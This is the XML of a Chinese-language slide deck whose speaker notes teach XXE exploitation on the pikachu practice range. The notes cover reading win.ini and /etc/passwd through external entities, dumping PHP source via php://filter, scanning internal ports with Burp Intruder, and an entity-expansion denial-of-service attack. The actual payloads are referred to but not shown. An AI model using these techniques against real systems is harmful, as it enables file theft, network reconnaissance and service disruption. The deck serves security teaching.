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1051" r:id="rId2"/>
    <p:sldId id="1052" r:id="rId3"/>
    <p:sldId id="284" r:id="rId4"/>
    <p:sldId id="318" r:id="rId5"/>
    <p:sldId id="1034" r:id="rId6"/>
    <p:sldId id="1035" r:id="rId7"/>
    <p:sldId id="1036" r:id="rId8"/>
    <p:sldId id="1037" r:id="rId9"/>
    <p:sldId id="285" r:id="rId10"/>
    <p:sldId id="1038" r:id="rId11"/>
    <p:sldId id="1039" r:id="rId12"/>
    <p:sldId id="1041" r:id="rId13"/>
    <p:sldId id="1042" r:id="rId14"/>
    <p:sldId id="1040" r:id="rId15"/>
    <p:sldId id="1043" r:id="rId16"/>
    <p:sldId id="1044" r:id="rId17"/>
    <p:sldId id="1046" r:id="rId18"/>
    <p:sldId id="1047" r:id="rId19"/>
    <p:sldId id="1048" r:id="rId20"/>
    <p:sldId id="1049" r:id="rId21"/>
    <p:sldId id="1053" r:id="rId22"/>
    <p:sldId id="1054" r:id="rId23"/>
    <p:sldId id="1055" r:id="rId24"/>
    <p:sldId id="1056" r:id="rId25"/>
    <p:sldId id="1057" r:id="rId26"/>
    <p:sldId id="1058" r:id="rId27"/>
    <p:sldId id="1059" r:id="rId28"/>
    <p:sldId id="1060" r:id="rId29"/>
    <p:sldId id="1061" r:id="rId30"/>
    <p:sldId id="1062" r:id="rId31"/>
    <p:sldId id="1063" r:id="rId32"/>
    <p:sldId id="1064" r:id="rId33"/>
    <p:sldId id="1065" r:id="rId34"/>
    <p:sldId id="1066" r:id="rId35"/>
    <p:sldId id="1067" r:id="rId36"/>
    <p:sldId id="1068" r:id="rId37"/>
    <p:sldId id="1069" r:id="rId38"/>
    <p:sldId id="1071" r:id="rId39"/>
    <p:sldId id="1073" r:id="rId40"/>
    <p:sldId id="1075" r:id="rId41"/>
    <p:sldId id="289"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guide id="3" pos="408" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="4" pos="7264" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="5" orient="horz" pos="648" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="6" orient="horz" pos="694" userDrawn="1">
          <p15:clr>
            <a:srgbClr val="A4A3A4"/>
          </p15:clr>
        </p15:guide>
        <p15:guide id="7" orient="horz" pos="3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998D"/>
    <a:srgbClr val="596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64976" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr snapToGrid="0" showGuides="1">
      <p:cViewPr varScale="1">
        <p:scale>
          <a:sx n="62" d="100"/>
          <a:sy n="62" d="100"/>
        </p:scale>
        <p:origin x="1742" y="48"/>
      </p:cViewPr>
      <p:guideLst>
        <p:guide orient="horz" pos="2304"/>
        <p:guide pos="3840"/>
        <p:guide pos="408"/>
        <p:guide pos="7264"/>
        <p:guide orient="horz" pos="648"/>
        <p:guide orient="horz" pos="694"/>
        <p:guide orient="horz" pos="391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1CC78-6400-4B5C-9D65-7218616781BD}" type="datetimeFigureOut">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
              <a:t>2023/8/19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6250E-D394-43D9-8472-C10F4E95414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我们使用的是</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>pikachu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>靶场，上次讲文件包含的同学也用到了这个靶场。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>pikachu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>靶场的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>模块提供了一个接收</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>xml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>数据的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>api</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>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85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>首先我们看一下通过</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漏洞读取任意文件。</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">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中可以通过</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>FILE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>协议、</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>协议和</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>FTP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>协议读取文件，还可利用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">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伪协议。</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在各语言下支持的协议都在这张图上显示</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首先我们需要判断这个接口是否有回显。可以构造</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>上这样一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>，然后发现提交后打印出来了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>xxe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>实体的值，因此是有回显的。</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在知道存在回显后，使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>SYSTEM</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>标识符可以尝试读取一些敏感目录，比如图中我们读取了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>win.ini</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>文件，它是每个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>windows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>系统都有的配置文件，</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>linux</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>系统的的话可以读取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>etc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>/passwd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>，当然想要读取其他文件目录，只需更改绝对路径即可，但要注意</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>file://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>协议只能使用绝对路径</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查看</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">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源代码一般用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1">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伪协议</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="85000"/>
                    <a:lumOff val="15000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-ea"/>
                <a:sym typeface="+mn-lt"/>
              </a:rPr>
              <a:t>php://filter</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1">
                  <a:lumMod val="85000"/>
                  <a:lumOff val="15000"/>
                </a:schemeClr>
              </a:solidFill>
              <a:cs typeface="+mn-ea"/>
              <a:sym typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>构造这样一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>可以访问</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>resource</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>路径下的文件并用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>base64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>编码的方式显示</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="4D4D4D"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="-apple-system"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>于是提交后得到了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>base64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>编码的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>test.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>文件源代码</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然后我们解密这串</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>base64</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>编码以后，可以得到这串</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>源码，跟我们直接访问这个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的显示是一致的，就是打印</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>hello</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>字符串</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XXE</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>漏洞还可以用于探测内网端口，构造这样一个</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>payload</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>然后使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>burpsuit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>抓包</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err="1"/>
              <a:t>burpsuit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>intruder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>模块，在端口</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>81</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的地方设置负载位置，然后设置载荷为</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1-100</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的连续整数，这里为了演示简单我们只探测了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>1-100</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>的</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点击</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>start attack</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>后可以得到每个负载请求的响应，然后我们对</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>response received</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>，就是接受响应这一列进行排序，发现只有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>端口的响应时间很短，说明</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>1-100</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>端口中只有</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>80</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="4D4D4D"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="-apple-system"/>
              </a:rPr>
              <a:t>端口开放</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还有一些</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0" err="1"/>
              <a:t>pikachu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>靶场无法演示的攻击方法也给大家进行一些介绍。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50505C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>通过引用实体，使得</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50505C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50505C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>内容指数型扩增，进行</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50505C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>dos</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50505C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>攻击</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="50505C"/>
              </a:solidFill>
              <a:effectLs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50505C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>考虑如图所示的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50505C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>XML</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50505C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>文档，从下往上看，可以看到文档内容引用了实体</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50505C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>lol9</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="0" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50505C"/>
                </a:solidFill>
                <a:effectLst/>
                <a:latin typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
                <a:ea typeface="华文楷体" panose="02010600040101010101" pitchFamily="2" charset="-122"/>
              </a:rPr>
              <a:t>，而</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1" i="0" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="50505C"/>
                </a:solidFill>
